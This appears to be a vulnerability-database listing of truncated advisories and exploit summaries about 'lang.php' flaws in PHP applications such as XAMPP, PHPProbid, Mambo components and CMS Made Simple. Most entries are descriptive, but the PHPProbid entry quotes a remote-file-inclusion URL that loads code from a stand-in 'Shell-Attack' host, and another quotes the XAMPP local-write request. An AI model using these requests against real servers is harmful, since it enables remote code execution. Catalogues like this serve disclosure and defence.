EUVD-2005-2045

Malware in sbrugna...

Improper Access Control

moodle/moodle is vulnerable to Improper Access Control. The vulnerability exists in parsefileinformationfromurl function of lang.php and loader.php due to improper folder restrictions which allows an attacker to send a specially crafted HTTP request and create arbitrary folders on the system...

MetInfo 5.2 /admin/include/common.inc.php 代码执行漏洞

/admin/include/common.inc.phpif!isarray$metlangadmin$GETlangset&&$GETlangset!=''die'not have this language'; if$GETlangset!='' $GETlangset=daddslashes$GETlangset,0,1; changemetcookie'languser',$GETlangset; savemetcookie; $M'user''cookie' = $metcookie; $metinfoadminname =...

Cross site scripting

XAMPP 1.8.1 does not properly restrict access to xampp/lang.php, which allows remote attackers to modify xampp/lang.tmp and execute cross-site scripting XSS attacks via the WriteIntoLocalDisk method...

XAMPP 1.8.1 (lang.php, WriteIntoLocalDisk method) - Local Write Access Vulnerability

No description provided by source. 通过访问以下链接： http://www.example.com/xampp/lang.php?WriteIntoLocalDisk 发现以下文件已经被修改： http://www.example.com/xampp/lang.tmp EXPLOIT-DB来源：https://www.exploit-db.com/exploits/28654/...

Joomla com_bayesiannaivefilter Component <= 1.1 Inclusion Vulnerability

No description provided by source. Pablin77 - XTech Inc Group combayesiannaivefilter Mambo Component Remote File Inclusion mosConfigabsolutepath Discovered By Pablin77 contact: Pablin77 at Argentina dot com Lebanon-Israel...STOP! No War!!! peace, that's all This is a massive cyber-protest, we are...

Gocart 1.0.2 Remote File Inclusion

============================== gocart-1.0.2 RFI Vulnerability ============================== Vendor: http://s3.amazonaws.com/gocart/gocart-1.0.2.zip Date: 2012-1-27 Author : indoushka Exploit By indoushka ------------- Function: includeonce File: CodeIgniter.php Line: 10 Exploit:...

PH Pexplorer <= 0.4.7.1 (lang.php) Remote Code Execution Exploit

Exploit for php platform in category web applications ================================================================ PH Pexplorer Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : Inj3ct0r.com 0 1 + Support e-mail : submitatinj3ct0r.com 1 0 0 1 1 0 I'm...

PHPProbid Lang.PHP远程文件包含漏洞

PHPProbid是一款基于PHP的WEB应用程序。 PHPProbid不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'Lang.PHP'脚本对用户提交的'src'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 PHPProbid 5.24 目前没有解决方案提供： http://www.phpprobid.com/ http://example.com//lang.php?lang=i%20height=1000%20width=1000%2 0src=http://Shell-Attack/...

CVE-2007-0758

Summary : CVE-2007-0758 is a PHP remote file inclusion vulnerability in the lang.php component of PHPProbid 5.24. The flaw allows an attacker to execute arbitrary PHP code by supplying a URL in the SRC attribute of an HTML element within the lang parameter. The affected product is PHPProbid 5.24;...

CVE-2006-5894

The CVE-2006-5894 entry documents a directory traversal flaw in Rama CMS 0.68 and earlier. When register_globals is enabled, an attacker can cause lang.php to include and execute arbitrary local files via a .. in the lang cookie, demonstrated by injecting PHP sequences into an Apache log file tha...

Joomla! Component com_bayesiannaivefilter 1.1 - Remote File Inclusion

Joomla! Component combayesiannaivefilter 1.1 - Remote File Inclusion Pablin77 - XTech Inc Group combayesiannaivefilter Mambo Component Remote File Inclusion mosConfigabsolutepath Discovered By Pablin77 contact: Pablin77 at Argentina dot com Lebanon-Israel...STOP! No War!!! peace, that's all This ...

Mambo Component Security Images 3.0.5 - Remote File Inclusion

Mambo Component Security Images 3.0.5 - Remote File Inclusion http://forge.joomla.org/sf/projects/comsecurityimages Marckusbest is the Best lamah of irc, fuck you comsecurityimages Mambo Remote File Include ------------------------------------------------------------------------------------ Bug...

Mambo Security Images Component &lt;= 3.0.5 Inclusion Vulnerabilities

No description provided by source. http://forge.joomla.org/sf/projects/comsecurityimages Marckusbest is the Best lamah of irc, fuck you comsecurityimages Mambo Remote File Include ------------------------------------------------------------------------------------ Bug Found by: Drago84 greetz:...

Mambo Component Security Images 3.0.5 - Remote File Inclusion

http://forge.joomla.org/sf/projects/comsecurityimages Marckusbest is the Best lamah of irc, fuck you comsecurityimages Mambo Remote File Include ------------------------------------------------------------------------------------ Bug Found by: Drago84 greetz: Exclusive Security This bug allows a...

CVE-2005-2846

CMS Made Simple

CMS Made Simple 0.10 - &#039;Lang.php&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/14709/info CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may exploit this issue to execute arbitrary remote PHP code on an affected...

CVE-2005-2198

SPiD (a PHP-based photo gallery) is affected by CVE-2005-2198 due to a remote file inclusion vulnerability in lang.php. The flaw allows an attacker to influence the lang_path parameter to include PHP code from an attacker-controlled location, enabling arbitrary code execution and potential disclo...

CVE-2005-2043

CVE-2005-2043 affects XAMPP prior to 1.4.14, where a directory traversal via lang.php allows remote attackers to inject arbitrary HTML and PHP code. This is a server-side input handling flaw in the XAMPP package, enabling code injection through the vulnerable script. The available documents do no...

CVE-2005-2043

Directory traversal vulnerability in XAMPP before 1.4.14 allows remote attackers to inject arbitrary HTML and PHP code via lang.php...